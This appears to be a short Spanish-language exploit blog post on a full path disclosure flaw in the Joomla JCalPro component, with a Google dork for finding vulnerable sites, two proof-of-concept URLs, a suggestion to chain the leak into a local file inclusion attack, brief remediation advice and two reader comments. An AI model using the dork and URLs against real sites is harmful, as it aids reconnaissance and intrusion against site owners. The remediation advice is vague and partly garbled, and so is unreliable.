# Exploit Título : Joomla Jcalpro Full Path Disclosure
# Exploit Autor : Sky_BlaCk
# Versión : 1.5,1.7
# Tested on : Window and Linux
# Google dork : [inurl:index.php?option=com_jcalpro]
--------------------
# ~ Explotación ~ #
-------------------------------
Concepto :
Full Path Disclosure (FPD) permiten al atacante ver la ruta de acceso al archivo webroot /. por ejemplo: /home/omg/htdocs/file/.Dicha vulnerabilidad nos puede ser muy útil al momento de hacer un posible ataque LFI.
PoC :
http://www.sitio.com/index.php?option=com_jcalpro&Itemid=112&extmode=cal&date=2012-01-01
http://www.sitio.com/index.php?option=com_jcalpro&Itemid=112&extmode=cal&date=2012-01-01&lang= ca_ES
Recomendaciones :
Asegúrese que la variable que intenta pasar exista y no es nulo primero. También debe asegurarse de que el nombre de la variable este escrito correctamente.
Se recomienda usar la función ($array), para asegurarse de que la variable que va a ingresar es de hecho un arreglo.
Buen post hermano... Saludos.
ResponderEliminarProbado! :D
ResponderEliminar